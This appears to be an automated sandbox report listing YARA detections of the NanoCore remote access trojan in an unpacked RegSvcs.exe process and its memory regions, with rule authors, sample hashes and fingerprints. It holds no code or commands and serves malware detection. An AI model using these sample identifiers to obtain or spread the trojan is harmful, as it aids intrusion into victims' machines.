Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
